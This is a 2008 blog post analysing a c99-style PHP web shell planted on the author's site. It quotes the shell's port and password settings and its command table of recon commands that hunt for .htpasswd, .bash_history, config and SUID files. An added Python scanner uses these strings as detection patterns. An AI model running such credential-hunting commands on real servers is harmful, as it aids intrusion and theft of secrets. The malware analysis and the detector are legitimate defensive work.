Saturday, January 5, 2008

write.php by MakeBuy source code

On Dec 31, 2007, a set of files was uploaded to my website. Here are the highlights:

  • is written in PHP,
  • filename is write.php,
  • has code to see lots of details about the localhost it lives on,
  • is functional on Linux/Unix OS,
  • sets a cookie on remote machines,
  • can email info to someone,
  • does a bunch of possibly evil things using MySQL,
  • and is web form controlled.

Particularly interesting code snippets are shown here (forgive the weird formatting for blogspot):

# Home page: http://ccteam.ru
$bindport_pass = "c99";
$bindport_port = "31373";
$bc_port = "31373";
$datapipe_localport = "8081";
$log_email = "oon.boy@gmail.com";
if (!$win)
{
    $cmdaliases = array(
        array(
            "------------ ls -la ------------------",
            "ls -la"
        ),
        array(
            "find all suid files",
            "find / -type f -perm -04000 -ls"
        ),
        array(
            "find suid files in current dir",
            "find . -type f -perm -04000 -ls"
        ),
        array(
            "find all sgid files",
            "find / -type f -perm -02000 -ls"
        ),
        array(
            "find sgid files in current dir",
            "find . -type f -perm -02000 -ls"
        ),
        array(
            "find config.inc.php files",
            "find / -type f -name config.inc.php"
        ),
        array(
            "find config* files",
            "find / -type f -name \"config*\""
        ),
        array(
            "find config* files in current dir",
            "find . -type f -name \"config*\""
        ),
        array(
            "find all writable folders and files",
            "find / -perm -2 -ls"
        ),
        array(
            "find all writable folders and files in current dir",
            "find . -perm -2 -ls"
        ),
        array(
            "find all service.pwd files",
            "find / -type f -name service.pwd"
        ),
        array(
            "find service.pwd files in current dir",
            "find . -type f -name service.pwd"
        ),
        array(
            "find all .htpasswd files",
            "find / -type f -name .htpasswd"
        ),
        array(
            "find .htpasswd files in current dir",
            "find . -type f -name .htpasswd"
        ),
        array(
            "find all .bash_history files",
            "find / -type f -name .bash_history"
        ),
        array(
            "find .bash_history files in current dir",
            "find . -type f -name .bash_history"
        ),
        array(
            "find all .fetchmailrc files",
            "find / -type f -name .fetchmailrc"
        ),
        array(
            "find .fetchmailrc files in current dir",
            "find . -type f -name .fetchmailrc"
        ),
        array(
            "list file attributes on a Linux second extended file system",
            "lsattr -va"
        ),
        array(
            "show opened ports",
            "netstat -an | grep -i listen"
        )
    );
}
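As an added example (not part of the original post or of the uploaded file), here is a small Python scanner that flags files carrying the configuration variables and reconnaissance commands visible in the snippet above. The indicator weights, the threshold and the function names are assumptions chosen for illustration, and the sample inputs are constructed.

```python
import re
from pathlib import Path

# Indicators come from the snippet quoted in this post; weights are assumed.
INDICATORS = [
    ("bind-port config", re.compile(r"\$bindport_(pass|port)\s*="), 3),
    ("back-connect port", re.compile(r"\$bc_port\s*="), 3),
    ("datapipe config", re.compile(r"\$datapipe_localport\s*="), 3),
    ("log e-mail setting", re.compile(r"\$log_email\s*="), 1),
    ("command alias table", re.compile(r"\$cmdaliases\s*=\s*array\s*\("), 2),
    ("suid/sgid search", re.compile(r"find\s+\S+\s+-type\s+f\s+-perm\s+-0[24]000"), 2),
    ("credential file search", re.compile(
        r"find\s+\S+\s+-type\s+f\s+-name\s+\S*"
        r"(\.htpasswd|service\.pwd|\.bash_history|\.fetchmailrc|config)"), 2),
]
THRESHOLD = 5  # assumed cut-off: one weak hit alone never flags a file

# Constructed sample inputs (not the uploaded file itself).
SAMPLE_SHELL = (
    '$bindport_pass = "x";\n$bc_port = "1";\n'
    '$cmdaliases = array(array("suid", "find / -type f -perm -04000 -ls"));\n'
)
SAMPLE_BENIGN = '<?php $log_email = "admin@example.org"; mail($log_email, "s", "b");'


def score_source(text):
    """Return (score, matched indicator names) for one file's contents."""
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(text)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def scan_tree(root, suffixes=(".php", ".phtml", ".inc")):
    """Return [(path, score, hits)] for flagged files; suffixes=None checks every file."""
    flagged = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        if suffixes is not None and path.suffix.lower() not in suffixes:
            continue
        score, hits = score_source(path.read_text(encoding="utf-8", errors="replace"))
        if score >= THRESHOLD:
            flagged.append((path, score, hits))
    return flagged


if __name__ == "__main__":
    for label, text in (("shell-like", SAMPLE_SHELL), ("benign", SAMPLE_BENIGN)):
        print(label, score_source(text))
```

A hit is a reason to inspect the file by hand. The variable names are trivial to rename, so a clean scan does not show that a site is free of this kind of script.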

I've saved the code as a JPG which can be easily read. You can click on the embedded images below to go to the JPGs, then download by clicking on the link to the right of the image.
